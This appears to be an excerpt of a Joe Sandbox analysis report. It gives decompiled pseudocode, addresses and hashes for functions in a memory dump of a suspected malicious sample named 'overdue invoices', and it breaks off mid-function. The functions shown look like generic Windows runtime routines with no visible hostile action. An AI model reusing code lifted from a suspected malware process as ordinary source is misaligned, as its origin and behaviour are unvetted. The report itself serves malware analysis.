                  • Instruction Fuzzy Hash: 3A310C31551B04EBCB26AB58C991B7BB7ADFF90760F214A25F5250B1D2DB70EC00C790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D3D43 Relevance: .1, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E009A7B60(0, _t61, 0x9711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E009A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L009B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                  0x009d3d4c
                  0x009d3d50
                  0x009d3d55
                  0x009d3d5e
                  0x00a0e79a
                  0x00000000
                  0x00a0e79a
                  0x009d3d68
                  0x00a0e789
                  0x009d3d9d
                  0x009d3da3
                  0x009d3daf
                  0x009d3db5
                  0x009d3dbc
                  0x009d3dc4
                  0x009d3dc9
                  0x009d3dce
                  0x00a0e7ae
                  0x00a0e7ae
                  0x009d3dde
                  0x009d3de2
                  0x009d3de7
                  0x009d3e0d
                  0x009d3e13
                  0x009d3e16
                  0x009d3e1e
                  0x009d3e25
                  0x009d3e28
                  0x00000000
                  0x00000000
                  0x009d3e2a
                  0x009d3e2f
                  0x009d3e37
                  0x009d3e37
                  0x00000000
                  0x009d3e37
                  0x009d3e31
                  0x00000000
                  0x009d3e31
                  0x009d3e20
                  0x009d3e20
                  0x009d3e35
                  0x00000000
                  0x009d3de9
                  0x009d3de9
                  0x009d3de9
                  0x009d3dee
                  0x009d3dfd
                  0x009d3dff
                  0x009d3e02
                  0x009d3e05
                  0x009d3e05
                  0x00000000
                  0x009d3df0
                  0x009d3de7
                  0x00a0e78f
                  0x00a0e794
                  0x009d3d79
                  0x009d3d84
                  0x009d3d89
                  0x009d3d8e
                  0x00000000
                  0x00a0e7a4
                  0x009d3d96
                  0x009d3d9a
                  0x00000000
                  0x009d3d9a
                  0x00000000
                  0x00a0e794
                  0x009d3d6e
                  0x009d3d73
                  0x00000000
                  0x00a0e7b5
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1dabdb06cef055f14742677d8fb8599fe05aed247938c389d376e19902efd163
                  • Instruction ID: f7357065d61f3776e92bc7b95a6415694fcc82674d6fe3c596e8907c6257712a
                  • Opcode Fuzzy Hash: 1dabdb06cef055f14742677d8fb8599fe05aed247938c389d376e19902efd163
                  • Instruction Fuzzy Hash: 6831DE31A44614DBC724CF29D842A6ABBE6EF85701B15C46AE849CB390E734DD40DBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CA61C Relevance: .1, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E009CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0xa70220);
				E009ED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0xa87b9c; // 0x0
				_t55 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E009ED0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0xa87b10 =  *0xa87b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0xa8536c; // 0x77f05368
					if( *_t51 != 0xa85368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0xa85368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0xa8536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = L009CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                  0x009ca61c
                  0x009ca61e
                  0x009ca623
                  0x009ca628
                  0x009ca62b
                  0x009ca62d
                  0x009ca648
                  0x009ca64a
                  0x009ca64f
                  0x00a09b44
                  0x009ca6ec
                  0x009ca6f1
                  0x009ca6f1
                  0x009ca655
                  0x009ca657
                  0x009ca65a
                  0x009ca65d
                  0x009ca662
                  0x009ca663
                  0x009ca667
                  0x009ca668
                  0x009ca66d
                  0x009ca706
                  0x009ca706
                  0x00a09bda
                  0x00a09be6
                  0x00a09beb
                  0x00000000
                  0x00a09beb
                  0x009ca679
                  0x00a09b7a
                  0x00000000
                  0x00a09b7a
                  0x009ca683
                  0x009ca6f4
                  0x009ca6f7
                  0x009ca6f9
                  0x009ca6fd
                  0x009ca6a0
                  0x009ca6a0
                  0x009ca6ad
                  0x009ca6af
                  0x009ca6b4
                  0x00a09ba7
                  0x00a09bac
                  0x00000000
                  0x00000000
                  0x00a09bc6
                  0x00a09bce
                  0x00a09bd1
                  0x00a09bd3
                  0x00a09bd3
                  0x00000000
                  0x00a09bd1
                  0x009ca6bd
                  0x009ca6c3
                  0x009ca6c6
                  0x009ca6d2
                  0x009ca701
                  0x009ca704
                  0x00000000
                  0x009ca704
                  0x009ca6d4
                  0x009ca6d6
                  0x009ca6d9
                  0x009ca6db
                  0x009ca6e1
                  0x009ca6e6
                  0x009ca6e8
                  0x009ca6e8
                  0x009ca6ea
                  0x00000000
                  0x009ca6ea
                  0x009ca688
                  0x009ca692
                  0x009ca694
                  0x009ca699
                  0x00000000
                  0x00000000
                  0x009ca69d
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9960c578d78c1e2d6f560c1a282da5e9aa758cc5647c8ce5ac3569412bec225f
                  • Instruction ID: 042736530b8b97aed1b24770580f382d4f35f329aa6647f5ba317668e3c5ef74
                  • Opcode Fuzzy Hash: 9960c578d78c1e2d6f560c1a282da5e9aa758cc5647c8ce5ac3569412bec225f
                  • Instruction Fuzzy Hash: DA416975E01209DFCB05CF68D990B99BBF1BB89314F19806DE804AF391D774AD01CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A17016 Relevance: .1, Instructions: 104COMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E00A17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0xa8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E00A16B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E00A16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E009B7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E009D9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L009DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L009B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                  0x00a17016
                  0x00a1701e
                  0x00a1702b
                  0x00a17033
                  0x00a17037
                  0x00a1703c
                  0x00a1703e
                  0x00a17041
                  0x00a17045
                  0x00a1704a
                  0x00a17050
                  0x00a17055
                  0x00a1705a
                  0x00a17062
                  0x00a17062
                  0x00a1705a
                  0x00a17064
                  0x00a17064
                  0x00a17067
                  0x00a17071
                  0x00a17096
                  0x00a1709b
                  0x00a170a2
                  0x00a170a6
                  0x00a170a7
                  0x00a170ad
                  0x00a170b3
                  0x00a170b6
                  0x00a170bb
                  0x00a170c3
                  0x00a170c3
                  0x00a170c6
                  0x00a170cd
                  0x00a170dd
                  0x00a170e0
                  0x00a170e2
                  0x00a170e2
                  0x00a170ee
                  0x00a17101
                  0x00a170f0
                  0x00a170f9
                  0x00a170f9
                  0x00a1710a
                  0x00a1710e
                  0x00a17112
                  0x00a17117
                  0x00a17118
                  0x00a17118
                  0x00a170bb
                  0x00a1711d
                  0x00a17123
                  0x00a17131
                  0x00a17131
                  0x00a17136
                  0x00a1713d
                  0x00a1713e
                  0x00a1713f
                  0x00a1714a
                  0x00a1714a
                  0x00a17084
                  0x00a17088
                  0x00000000
                  0x00a1708e
                  0x00a1708e
                  0x00a17092
                  0x00000000
                  0x00a17092

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2a2156802e00de797df2096a2527c6a508e4247c11138e73149dded230b95bc
                  • Instruction ID: 37d2f0a3e31a9e3647b1e136c7b6b5b738de433462ed2960f50a4a01383fa751
                  • Opcode Fuzzy Hash: a2a2156802e00de797df2096a2527c6a508e4247c11138e73149dded230b95bc
                  • Instruction Fuzzy Hash: FE319372608751ABC320DF68C941AAAB7F5BFC8710F054A29F89587791E730ED44C7A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009BC182 Relevance: .1, Instructions: 104COMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E009BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E009B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E00A68D34(_v8, _t80);
					}
					E009B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L009AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E00A68833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L009AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E009DB180();
						if(_a4 != 0) {
							E009B2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E009BBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E009BBB2D(_t16, _t15);
						E009BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L009AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L009AFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L009AFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                  0x009bc18d
                  0x009bc18f
                  0x009bc191
                  0x009bc19b
                  0x009bc1a0
                  0x009bc1d4
                  0x009bc1de
                  0x00a02d6e
                  0x009bc1e4
                  0x009bc1e4
                  0x009bc1e4
                  0x009bc1ec
                  0x00a02d7d
                  0x00a02d7d
                  0x009bc1f3
                  0x009bc1ff
                  0x00a02d88
                  0x00a02d8d
                  0x00a02d94
                  0x00a02d94
                  0x00a02d9f
                  0x00a02da4
                  0x00a02dab
                  0x00a02db0
                  0x00a02db2
                  0x00a02db3
                  0x00a02db4
                  0x00a02dbc
                  0x00a02dc3
                  0x00a02dc3
                  0x009bc205
                  0x009bc205
                  0x009bc208
                  0x009bc20e
                  0x009bc211
                  0x009bc216
                  0x009bc219
                  0x009bc21f
                  0x009bc222
                  0x009bc22c
                  0x009bc234
                  0x009bc23a
                  0x009bc23f
                  0x009bc245
                  0x009bc24b
                  0x009bc251
                  0x009bc25a
                  0x009bc276
                  0x009bc27d
                  0x009bc27d
                  0x009bc25c
                  0x009bc25c
                  0x00000000
                  0x009bc25e
                  0x009bc1a4
                  0x009bc1aa
                  0x009bc1b3
                  0x009bc265
                  0x009bc26c
                  0x009bc26c
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                  • Instruction ID: 622713bc34ab22b637280a0083087301f8c1c66cd0a9e491d4c4c1ae035dc7ee
                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                  • Instruction Fuzzy Hash: 903139B160554ABED704EBF4C691BE9FB58BF82314F14816AE42C57342DB38AD09D7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C61A0 Relevance: .1, Instructions: 93COMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E009C61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L009C5E50(0x9767cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E00A69D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L0099F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                  0x009c61b3
                  0x009c61b5
                  0x009c61bd
                  0x009c61c3
                  0x009c61c7
                  0x009c61d2
                  0x009c61ff
                  0x009c61ff
                  0x009c6201
                  0x009c6207
                  0x009c6207
                  0x009c61d4
                  0x009c61d9
                  0x00000000
                  0x00000000
                  0x009c61df
                  0x009c61e2
                  0x00000000
                  0x00000000
                  0x009c61e6
                  0x009c61e8
                  0x009c61ee
                  0x009c61ee
                  0x009c61f9
                  0x00a0762f
                  0x00a07632
                  0x00a07635
                  0x00a07639
                  0x00a07640
                  0x00a0766e
                  0x00a07675
                  0x00000000
                  0x00000000
                  0x00a07681
                  0x00a07689
                  0x00a0768d
                  0x00a07691
                  0x00a07695
                  0x00a07699
                  0x00a076af
                  0x00a076b5
                  0x00a076b7
                  0x00a076b7
                  0x00a076d7
                  0x00a076dc
                  0x00000000
                  0x00a076dc
                  0x00a076a2
                  0x00a076a9
                  0x00a07651
                  0x00a07653
                  0x00a07653
                  0x00a07656
                  0x00a07656
                  0x00000000
                  0x00a07656
                  0x00a07644
                  0x00a07646
                  0x00a07648
                  0x00a07648
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8c70af1c39c05539a2f9590fbd4e8e7be1cc4d038f4668ed969714f514bca4dc
                  • Instruction ID: 762b3eca8ffe9a73764951db20523faa0cdb44d0849074478098c2b8da4f236c
                  • Opcode Fuzzy Hash: 8c70af1c39c05539a2f9590fbd4e8e7be1cc4d038f4668ed969714f514bca4dc
                  • Instruction Fuzzy Hash: 3C316B71A097018FD360CF19C900F2AB7E8FB88B00F59496DE99997391E771EC44CB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099AA16 Relevance: .1, Instructions: 93COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0099AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0xa8d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0xa87b9c; // 0x0
					_t53 = L009B4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L009DB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E009DF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L009A6C59(_t53, _t51, _t58) != 0) {
							_t28 = L009C5E50(0x97c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E009CB230(_v32, _v28, 0x97c2d8, 1,  &_v24);
								_t28 = L0099F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                  0x0099aa25
                  0x0099aa29
                  0x0099aa2d
                  0x0099aa30
                  0x0099aa37
                  0x0099aa3c
                  0x009f4458
                  0x009f4458
                  0x009f4472
                  0x009f4474
                  0x009f4476
                  0x0099aa64
                  0x0099aa74
                  0x009f447c
                  0x009f4483
                  0x009f4492
                  0x0099aa52
                  0x0099aa54
                  0x0099aa5e
                  0x009f44a8
                  0x009f44ad
                  0x009f44af
                  0x009f44b6
                  0x009f44b6
                  0x009f44b9
                  0x009f44bc
                  0x009f44cd
                  0x009f44d3
                  0x009f44d6
                  0x009f44e1
                  0x009f44e1
                  0x009f44e6
                  0x009f44e8
                  0x009f44fb
                  0x009f44fb
                  0x009f44e8
                  0x00000000
                  0x0099aa5e
                  0x009f4476
                  0x0099aa42
                  0x0099aa46
                  0x0099aa48
                  0x0099aa4c
                  0x00000000
                  0x00000000
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b5f49c0ea3909a0250bdd495fb76e83adea539706599007f412b4b5eab82275
                  • Instruction ID: 3adaea3858cd6f0708b79a53292cd67cacf6d1700780990d835bace33378d180
                  • Opcode Fuzzy Hash: 0b5f49c0ea3909a0250bdd495fb76e83adea539706599007f412b4b5eab82275
                  • Instruction Fuzzy Hash: 0931B172A00219ABCF109FA8CD82BBFB7B9EF44700B11446AF905EB251E7749D11DBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D8EC7 Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E009D8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0xa8d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = L009C4E70(0xa886e4, 0x9d9490, 0, 0);
					if( *0xa853e8 > 5 && L009D8F33(0xa853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
